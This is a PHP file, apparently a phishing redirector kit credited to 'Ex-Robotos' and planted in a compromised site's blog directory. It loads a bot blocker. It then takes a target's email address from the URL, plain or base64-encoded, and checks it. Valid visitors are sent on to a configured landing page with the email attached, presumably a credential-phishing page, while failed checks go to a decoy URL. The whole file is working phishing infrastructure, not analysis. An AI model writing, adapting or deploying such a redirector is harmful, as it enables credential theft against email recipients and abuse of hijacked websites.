File: C:/inetpub/vhosts/hrreflections.com/httpdocs/blog/a9z/index.php
<?php
/*
New redirect v3 2020 by Ex-Robotos
Email: ex.robotos@gmail.com
Facebook: facebook.com/Ex.Robotos
ICQ: @745771262
*/
error_reporting(0);include('blocker.php');include('config.php');
if($autoEmail==false || $autoEmail=="false" || $autoEmail=="FALSE" || $autoEmail=="False"){
if($redirecttype==1 || $redirecttype=='1'){
header("Location: ".$pagelink);
}else{
echo "<script type=\"text/javascript\">window.location.href = \"$pagelink\"</script>\n";
}
die();
}
preg_match("/[^\/]+$/", urldecode( $_SERVER[ "REQUEST_URI" ] ), $matches);
$data = $matches[0];
function begnWith($str, $begnString) {
$len = strlen($begnString);
return (substr($str, 0, $len) === $begnString);
}
if(begnWith($data,"?"))
{
$data = ltrim($data, '?');
}
function endsWith($string, $endString)
{
$len = strlen($endString);
if ($len == 0) {
return true;
}
return (substr($string, -$len) === $endString);
}
if(endsWith($pagelink,"/"))
{
$pagelink = rtrim($pagelink, '/');
}
if ( base64_encode(base64_decode($data)) === $data){
$email = filter_var(base64_decode($data), FILTER_SANITIZE_EMAIL);
if (!filter_var($email, FILTER_VALIDATE_EMAIL)) {
if($redirecttype==1 || $redirecttype=='1'){
header("Location: ".$FailRedirect);
}else{
echo "<script type=\"text/javascript\">window.location.href = \"$FailRedirect\"</script>\n";
}
die();
} else {
$email = $data;
}
} else if(filter_var($data, FILTER_VALIDATE_EMAIL)) {
$email = base64_encode($data);
} else {
if($redirecttype==1 || $redirecttype=='1'){
header("Location: ".$FailRedirect);
}else{
echo "<script type=\"text/javascript\">window.location.href = \"$FailRedirect\"</script>\n";
}
die();
}
if($redirecttype==1 || $redirecttype=='1'){
header("Location: ".$pagelink."/".$email);
}else{
echo "<script type=\"text/javascript\">window.location.href = \"$pagelink/$email\"</script>\n";
}
die();
?>